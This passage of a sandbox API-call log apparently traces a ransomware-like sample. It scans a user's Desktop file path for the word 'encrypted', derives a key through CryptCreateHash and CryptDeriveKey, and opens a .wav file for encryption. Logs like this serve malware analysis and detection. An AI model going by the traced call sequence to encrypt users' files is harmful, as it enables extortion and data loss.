(Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\EVqXht.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.052] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\EVqXht.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.052] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\EVqXht.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.052] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\EVqXht.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.052] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\EVqXht.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.052] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\EVqXht.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.052] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\EVqXht.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.052] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\EVqXht.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.052] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\EVqXht.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.052] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\EVqXht.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.052] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\EVqXht.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.052] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\EVqXht.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.052] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\EVqXht.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.052] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\EVqXht.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.052] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\EVqXht.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.052] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\EVqXht.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.052] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\EVqXht.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.052] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\EVqXht.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.052] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\EVqXht.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.052] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\EVqXht.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.052] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\EVqXht.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.052] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\EVqXht.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.052] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\EVqXht.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.052] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\EVqXht.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.052] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\EVqXht.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.052] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\EVqXht.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.052] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\EVqXht.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.052] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\EVqXht.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.052] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="esktop\\tPM9533uYXhl8C6vtf\\tjNI\\EVqXht.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.052] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sktop\\tPM9533uYXhl8C6vtf\\tjNI\\EVqXht.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.052] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ktop\\tPM9533uYXhl8C6vtf\\tjNI\\EVqXht.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.052] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="top\\tPM9533uYXhl8C6vtf\\tjNI\\EVqXht.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.052] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="op\\tPM9533uYXhl8C6vtf\\tjNI\\EVqXht.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.052] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p\\tPM9533uYXhl8C6vtf\\tjNI\\EVqXht.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.052] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\tPM9533uYXhl8C6vtf\\tjNI\\EVqXht.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.052] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tPM9533uYXhl8C6vtf\\tjNI\\EVqXht.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.052] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PM9533uYXhl8C6vtf\\tjNI\\EVqXht.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.052] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="M9533uYXhl8C6vtf\\tjNI\\EVqXht.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.053] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9533uYXhl8C6vtf\\tjNI\\EVqXht.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.053] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="533uYXhl8C6vtf\\tjNI\\EVqXht.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.053] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="33uYXhl8C6vtf\\tjNI\\EVqXht.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.053] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3uYXhl8C6vtf\\tjNI\\EVqXht.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.053] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uYXhl8C6vtf\\tjNI\\EVqXht.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.053] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YXhl8C6vtf\\tjNI\\EVqXht.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.053] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Xhl8C6vtf\\tjNI\\EVqXht.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.053] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hl8C6vtf\\tjNI\\EVqXht.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.053] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="l8C6vtf\\tjNI\\EVqXht.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.053] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8C6vtf\\tjNI\\EVqXht.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.053] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C6vtf\\tjNI\\EVqXht.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.053] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6vtf\\tjNI\\EVqXht.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.053] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vtf\\tjNI\\EVqXht.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.053] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tf\\tjNI\\EVqXht.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.053] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f\\tjNI\\EVqXht.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.053] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\tjNI\\EVqXht.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.053] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tjNI\\EVqXht.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.053] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jNI\\EVqXht.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.053] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NI\\EVqXht.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.053] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="I\\EVqXht.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.053] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\EVqXht.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.053] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EVqXht.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.053] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VqXht.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.053] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="qXht.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.053] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0031.053] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0031.053] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0031.053] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0031.053] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0031.053] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="av", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0031.053] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wav", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0031.053] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".wav", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0031.053] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0031.054] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0031.054] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0031.054] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0031.054] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\EVqXht.wav", lpFindFileData=0x6ae7b8 | out: lpFindFileData=0x6ae7b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x681bcef0, ftCreationTime.dwHighDateTime=0x1d5b666, ftLastAccessTime.dwLowDateTime=0xc4a5bca0, ftLastAccessTime.dwHighDateTime=0x1d5c0b4, ftLastWriteTime.dwLowDateTime=0xc4a5bca0, ftLastWriteTime.dwHighDateTime=0x1d5c0b4, nFileSizeHigh=0x0, nFileSizeLow=0x1575, dwReserved0=0x6ae908, dwReserved1=0x777648, cFileName="EVqXht.wav", cAlternateFileName="")) returned 0x7c2240 [0031.054] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0031.054] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0031.054] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0031.054] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x754b0000 [0031.054] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0031.054] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0031.054] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0031.054] CryptAcquireContextA (in: phProv=0x6ae498, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ae498*=0x7d5bb8) returned 1 [0031.055] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0031.055] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0031.055] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0031.055] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0031.056] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0031.056] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0031.056] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0031.056] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0031.056] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0031.056] CryptCreateHash (in: hProv=0x7d5bb8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x6ae208 | out: phHash=0x6ae208) returned 1 [0031.056] CharLowerBuffW (in: lpsz="byte[256]", cchLength=0x9 | out: lpsz="byte[256]") returned 0x9 [0031.056] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0031.056] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0031.056] CryptHashData (hHash=0x7c2100, pbData=0x7c75d0, dwDataLen=0x100, dwFlags=0x1) returned 1 [0031.056] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0031.056] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0031.056] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0031.056] CryptDeriveKey (in: hProv=0x7d5bb8, Algid=0x660e, hBaseData=0x7c2100, dwFlags=0x1, phKey=0x6ae208 | out: phKey=0x6ae208*=0x7c21c0) returned 1 [0031.056] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0031.056] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0031.056] CryptDestroyHash (hHash=0x7c2100) returned 1 [0031.056] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\EVqXht.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tpm9533uyxhl8c6vtf\\tjni\\evqxht.wav"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0031.057] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0031.057] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae940 | out: lpNewFilePointer=0x0) returned 1 [0031.057] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0031.057] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb50 [0031.057] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0031.057] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0031.057] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0031.057] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0031.057] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b48 | out: hHeap=0x770000) returned 1 [0031.057] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0031.057] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.057] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0031.057] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b85a8 [0031.057] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0031.057] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b85a8 | out: hHeap=0x770000) returned 1 [0031.057] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0031.057] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0031.057] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2100 [0031.057] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.057] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0031.057] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.057] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0031.057] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b48 [0031.057] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0031.057] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0031.057] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0031.057] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0031.057] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0031.057] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0031.057] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0031.057] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0031.057] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0031.058] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0031.058] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0031.058] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0031.058] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0031.058] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0031.058] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0031.058] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb98 [0031.058] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0031.058] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0031.058] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0031.058] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0031.058] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0031.058] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0031.058] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da358 [0031.058] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0031.058] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0031.058] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0031.058] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb0) returned 0x7c5758 [0031.058] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0031.058] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5b30 [0031.058] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0031.058] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5c40 [0031.058] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5758 | out: hHeap=0x770000) returned 1 [0031.058] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0031.058] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0031.058] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da358 | out: hHeap=0x770000) returned 1 [0031.058] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.058] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0031.058] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5b30 | out: hHeap=0x770000) returned 1 [0031.058] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0031.058] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0031.058] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0031.058] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0031.059] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5b30 [0031.059] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tpm9533uyxhl8c6vtf\\tjni")) returned 0x10 [0031.059] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5b30 | out: hHeap=0x770000) returned 1 [0031.059] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0031.059] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5c40 | out: hHeap=0x770000) returned 1 [0031.059] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0031.059] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 